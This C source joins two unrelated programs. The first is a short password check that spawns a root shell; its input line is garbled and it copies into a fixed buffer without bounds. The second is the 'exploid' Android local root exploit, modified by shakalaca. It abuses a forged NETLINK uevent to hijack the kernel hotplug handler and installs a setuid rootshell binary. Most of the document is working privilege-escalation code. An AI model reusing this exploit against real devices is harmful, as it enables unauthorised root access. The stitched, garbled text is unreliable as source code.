int main(){
char real_pass[100];
char user_pass[100];
size_t len = 0;
//get root password from file
FILE * source = fopen("password.txt","r");
if (source == NULL){
perror("fopen");
printf("Unable to read password.txt!");
return;
}
char * buf = NULL;
while(getline(&buf, &len, source) > 0){
strcpy(real_pass,buf);
}
fclose(source);
int len2 = strlen(real_pass);
if(real_pass[len2-1] == '\n')
real_pass[len2-1] = 0;
//get user's attempt
printf("enter root password: "******"%s", user_pass);
if(strcmp(real_pass,user_pass) == 0){
printf("here comes a shell!\n");
rootshell();
}else{
printf("incorrect password");
}
}
int main(int argc, char **argv, char **env)
{
char buf[512], path[512], buf2[512];
int ofd, ifd;
struct sockaddr_nl snl;
struct iovec iov = {buf, sizeof(buf)};
struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
int sock;
char *basedir = NULL;
int len;
char path_fix[512];
/* shakalaca: check if this program is called from UI or from CLI { */
char pwd[128];
memset(pwd, 0, sizeof(pwd));
readlink("/proc/self/fd/0", pwd, sizeof(pwd));
/* shakalaca: check if this program is called from UI or from CLI } */
/* I hope there is no LD_ bug in androids rtld :) */
if (geteuid() == 0 && getuid() != 0)
rootshell(env, argv);
memset(path, 0, sizeof(path));
if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
die("[-] readlink");
len = strlen(path);
if (path[len - 1] > 127) {
len--;
}
if (geteuid() == 0) {
char mp[128], fstype[16];
clear_hotplug();
strncpy(path_fix, path, len);
path_fix[len] = '\0';
/* remount /system rw */
/* shakalaca: read mount settings from file { */
/*
if (mount("/dev/mtdblock0", "/system", "yaffs2", MS_REMOUNT, 0) < 0)
mount("/dev/mtdblock0", "/system", "yaffs", MS_REMOUNT, 0);
*/
/* test /sqlite_stmt_journals first */
if ((ofd = creat("/sqlite_stmt_journals/test", 0644)) < 0) {
/* failed, try /app-cache or /data/local/tmp. either way should mount
/data first, in case failed */
/* shakalaca: check mount file and change to right directory */
if ((ifd = open("/sqlite_stmt_journals/mount", O_RDONLY)) < 0) {
if ((ifd = open("/data/local/tmp/mount", O_RDONLY)) < 0) {
if ((ifd = open("/data/data/com.corner23.android.universalandroot/files/mount", O_RDONLY)) < 0) {
die("[-] missing required files..");
} else {
close(ifd);
chdir("data/data/com.corner23.android.universalandroot/files/");
}
} else {
close(ifd);
chdir("/data/local/tmp");
}
} else {
close(ifd);
chdir("/sqlite_stmt_journals");
}
if ((ifd = open("mount", O_RDONLY)) < 0)
die("[-] open mount point");
if (read(ifd, mp, sizeof(mp)) < 0)
die("[-] read mount point");
close(ifd);
if ((ifd = open("fs_type", O_RDONLY)) < 0)
die("[-] open fs type");
if (read(ifd, fstype, sizeof(fstype)) < 0)
die("[-] read fs type");
close(ifd);
mount(mp, "/data", fstype, MS_REMOUNT, 0);
/* shakalaca: read mount settings from file } */
if ((ofd = creat("/app-cache/test", 0644)) < 0) {
copy(path_fix, "/data/local/tmp/rootshell");
chmod("/data/local/tmp/rootshell", 04711);
} else {
close(ofd);
unlink("/app-cache/test");
if (copy(path_fix, "/app-cache/rootshell") < 0) {
copy(path_fix, "/data/local/tmp/rootshell");
chmod("/data/local/tmp/rootshell", 04711);
} else {
chmod("/app-cache/rootshell", 04711);
}
}
} else {
close(ofd);
unlink("/sqlite_stmt_journals/test");
copy(path_fix, "/sqlite_stmt_journals/rootshell");
chmod("/sqlite_stmt_journals/rootshell", 04711);
}
/* shakalaca: do not loop forever, it will eat cpu resource { */
/*
for (;;);
*/
exit(1);
/* shakalaca: do not loop forever, it will eat cpu resource } */
}
printf("[*] Android local root exploid (C) The Android Exploid Crew\n");
printf("[*] Modified by shakalaca for various devices\n");
/*
basedir = "/sqlite_stmt_journals";
if (chdir(basedir) < 0) {
basedir = "/data/local/tmp";
if (chdir(basedir) < 0)
basedir = strdup(getcwd(buf, sizeof(buf)));
}
*/
basedir = "/sqlite_stmt_journals";
if (chdir(basedir) < 0) {
basedir = strdup(getcwd(buf, sizeof(buf)));
if (chdir("/data/local/tmp") < 0) {
// Use from Android UI, fall back to project directory
if (strncmp(pwd, "/dev/pts/", 9) != 0) {
basedir = "/data/data/com.corner23.android.universalandroot/files";
if (chdir(basedir) < 0)
die("[-] chdir");
}
} else {
// test if it's writable
if ((ofd = creat("test", 0644)) < 0) {
if (strncmp(pwd, "/dev/pts/", 9) != 0) {
// Use from Android UI, fall back to project directory
basedir = "/data/data/com.corner23.android.universalandroot/files";
}
if (chdir(basedir) < 0)
die("[-] chdir");
} else {
basedir = "/data/local/tmp";
unlink("test");
}
close(ofd);
}
}
printf("[+] Using basedir=%s, path=%s\n", basedir, path);
printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n");
/* shakalaca: remove old data if possible { */
unlink("data");
unlink("hotplug");
unlink("loading");
unlink("mount");
unlink("fs_type");
/* shakalaca: remove old data if possible } */
memset(&snl, 0, sizeof(snl));
snl.nl_pid = 1;
snl.nl_family = AF_NETLINK;
if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
die("[-] socket");
close(creat("loading", 0666));
if ((ofd = creat("hotplug", 0644)) < 0)
die("[-] creat");
if (write(ofd, path, len) < 0)
die("[-] write");
close(ofd);
/* shakalaca: for remember mount device and filesystem type of /system { */
if ((ofd = creat("mount", 0644)) < 0)
die("[-] creat mount point");
if (write(ofd, argv[1], strlen(argv[1])) < 0)
die("[-] write mount point");
close(ofd);
if ((ofd = creat("fs_type", 0644)) < 0)
die("[-] creat fs type");
if (write(ofd, argv[2], strlen(argv[2])) < 0)
die("[-] write fs type");
close(ofd);
/* shakalaca: for remember mount device and filesystem type of /system } */
symlink("/proc/sys/kernel/hotplug", "data");
snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
"SUBSYSTEM=firmware%c"
"FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
printf("[+] sending add message ...\n");
if (sendmsg(sock, &msg, 0) < 0)
die("[-] sendmsg");
close(sock);
printf("[*] Try to invoke hotplug now, clicking at the wireless\n"
"[*] settings, plugin USB key etc.\n"
"[*] You succeeded if you find /system/bin/rootshell.\n"
"[*] GUI might hang/restart meanwhile so be patient.\n");
sleep(1);
return 0;
}
